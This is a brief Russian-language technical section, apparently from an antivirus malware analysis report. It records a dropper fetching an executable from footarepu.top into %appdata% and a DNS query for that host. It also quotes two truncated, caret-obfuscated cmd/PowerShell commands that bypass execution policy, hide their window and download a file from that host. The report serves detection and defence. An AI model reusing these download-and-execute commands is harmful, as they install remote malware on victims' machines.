Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powers^hE^l^L^.EXe -ExEc^UtiONPOL^IC^Y bYpa^Ss -NoPrO^F^IlE -^WI^NdOWS^tYLe h^I^dden (neW-^oB^J^Ec^T ^Sys^TEm.^N^E^T.W^Ebc^l^ien^T^)^.d^oW^n^Lo^AdF^Il^e^('http://footarepu.top/rea...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "powers^hE^l^L^.EXe -ExEc^UtiONPOL^IC^Y bYpa^Ss -NoPrO^F^IlE -^WI^NdOWS^tYLe h^I^dden (neW-^oB^J^Ec^T ^Sys^TEm.^N^E^T.W^Ebc^l^ien^T^)^.d^oW^n^Lo^AdF^Il^e^('http://footarepu.top/rea...' (со скрытым окном)